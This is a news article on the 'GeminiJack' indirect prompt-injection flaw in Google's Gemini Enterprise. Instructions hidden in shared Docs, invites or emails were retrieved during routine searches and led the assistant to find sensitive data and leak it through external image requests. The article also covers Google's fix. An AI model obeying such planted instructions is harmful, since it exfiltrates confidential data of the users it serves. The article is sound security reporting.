A newly disclosed vulnerability in Google’s Gemini Enterprise platform exposed how retrieval-augmented generation can be weaponized to turn an AI assistant into a covert data-leak channel.
The issue, dubbed GeminiJack by Noma Labs, allowed attackers to plant hidden instructions inside a shared Google Doc, Calendar invite, or Gmail message.
When any employee later used Gemini Enterprise to run a standard search, the system automatically retrieved the poisoned content and executed those instructions with the employee’s permissions.
The flaw stems from how Gemini Enterprise and the former Vertex AI Search system mixed retrieved content with user prompts.
The model treated injected text as legitimate instructions, enabling an attacker to direct the AI to search for sensitive information, such as financial plans, acquisition discussions, customer data, or confidential documents, and then embed the results in an external image request. Because browsers routinely load images, the exfiltration appeared indistinguishable from normal traffic.
Google confirmed the findings, collaborated on the investigation, and deployed architectural changes. Vertex AI Search is now fully separated from Gemini Enterprise, and both systems have updated retrieval and indexing interactions to prevent instruction/content confusion. The company documented the fix in an advisory published today.
A New Class of AI-Native Exposure
The research demonstrates how indirect prompt injection can bypass traditional defenses; no clicks were required. Employees merely performed everyday searches. No malware, credential theft, or policy violations occurred. DLP systems saw only a routine AI query, followed by a normal image load.
Jason Soroko, Senior Fellow at Sectigo, told Expert Insights that once an AI assistant can read across Workspace services, it becomes “a new high privilege access layer,” and that a poisoned file “can silently turn that assistant into an exfiltration channel.” He emphasized that this represents a broader architectural challenge where models act on untrusted content pulled from internal systems.
GeminiJack shows how AI systems with broad, persistent data access can expand the blast radius of prompt injection. As organizations adopt retrieval-driven assistants, they will need stronger content validation, tighter data-source permissions, and monitoring designed for AI behaviors, not just user behaviors.
